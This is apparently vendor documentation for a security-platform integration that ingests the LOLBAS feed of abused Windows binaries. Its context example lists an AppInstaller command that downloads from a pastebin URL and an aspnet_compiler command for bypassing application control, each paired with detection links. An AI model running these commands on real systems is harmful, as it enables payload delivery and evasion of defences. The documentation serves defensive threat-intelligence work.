Skip to main content

LOLBAS Feed

This Integration is part of the LOLBAS Feed Pack.#

Supported versions

Supported Cortex XSOAR versions: 6.8.0 and later.

This integration was integrated and tested with version v1 of LOLBAS.

Configure LOLBAS Feed on Cortex XSOAR#

  1. Navigate to Settings > Integrations > Servers & Services.

  2. Search for LOLBAS Feed.

  3. Click Add instance to create and configure a new integration instance.

    ParameterDescriptionRequired
    Base URLTrue
    Fetch indicatorsFalse
    Indicator ReputationIndicators from this integration instance will be marked with this reputation.False
    Source ReliabilityReliability of the source providing the intelligence data.True
    Traffic Light Protocol ColorThe Traffic Light Protocol (TLP) designation to apply to indicators fetched from the feed.False
    Bypass exclusion listWhen selected, the exclusion list is ignored for indicators from this feed. This means that if an indicator from this feed is on the exclusion list, the indicator might still be added to the system.False
    Use system proxy settingsFalse
    Trust any certificate (not secure)False
    TagsSupports CSV values.False
    Create relationshipsFalse
    Feed Fetch IntervalFalse

  4. Click Test to validate the URLs, token, and connection.

Commands#

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

lolbas-get-indicators#

Retrieves a limited number of indicators.

Base Command#

lolbas-get-indicators

Input#

Argument NameDescriptionRequired
limitThe maximum number of indicators to return.Required

Context Output#

PathTypeDescription
LOLBAS.Indicators.Commands.categoryStringThe category of the command.
LOLBAS.Indicators.Commands.commandStringThe command.
LOLBAS.Indicators.Commands.descriptionStringThe description of the command.
LOLBAS.Indicators.Commands.mitreidStringThe MITRE ID related to the command.
LOLBAS.Indicators.Commands.operatingsystemStringThe operating system the command ran on.
LOLBAS.Indicators.Commands.privilegesStringThe privileges required to run the command.
LOLBAS.Indicators.Commands.usecaseStringThe use case of the command.
LOLBAS.Indicators.DescriptionStringThe description of the indicator.
LOLBAS.Indicators.Detections.contentStringThe content of the detection.
LOLBAS.Indicators.Detections.typeStringThe type of the detection.
LOLBAS.Indicators.NameStringThe name of the indicator.
LOLBAS.Indicators.Paths.pathStringThe path of the indicator.
LOLBAS.Indicators.TypeStringThe type of the indicator.

Command example#

!lolbas-get-indicators limit=2

Context Example#

{
"LOLBAS": {
"Indicators": [
{
"Commands": [
{
"category": "Download",
"command": "start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw",
"description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\<RANDOM-8-CHAR-DIRECTORY>",
"mitreid": "Ingress Tool Transfer",
"operatingsystem": "Windows 10, Windows 11",
"privileges": "User",
"usecase": "Download file from Internet"
}
],
"Description": "Tool used for installation of AppX/MSIX applications on Windows 10",
"Detections": [
{
"content": "https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml",
"type": "Sigma"
}
],
"Name": "AppInstaller.exe",
"Paths": [
{
"path": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"
}
],
"Type": "Tool"
},
{
"Commands": [
{
"category": "AWL Bypass",
"command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u",
"description": "Execute C# code with the Build Provider and proper folder structure in place.",
"mitreid": "Trusted Developer Utilities Proxy Execution",
"operatingsystem": "Windows 10, Windows 11",
"privileges": "User",
"usecase": "Execute proxied payload with Microsoft signed binary to bypass application control solutions"
}
],
"Description": "ASP.NET Compilation Tool",
"Detections": [
{
"content": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
"type": "BlockRule"
},
{
"content": "https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml",
"type": "Sigma"
}
],
"Name": "Aspnet_Compiler.exe",
"Paths": [
{
"path": "c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"
},
{
"path": "c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"
}
],
"Type": "Tool"
}
]
}
}

Human Readable Output#

LOLBAS indicators#

NameDescription
AppInstaller.exeTool used for installation of AppX/MSIX applications on Windows 10
Aspnet_Compiler.exeASP.NET Compilation Tool
Edit this page
Report an Issue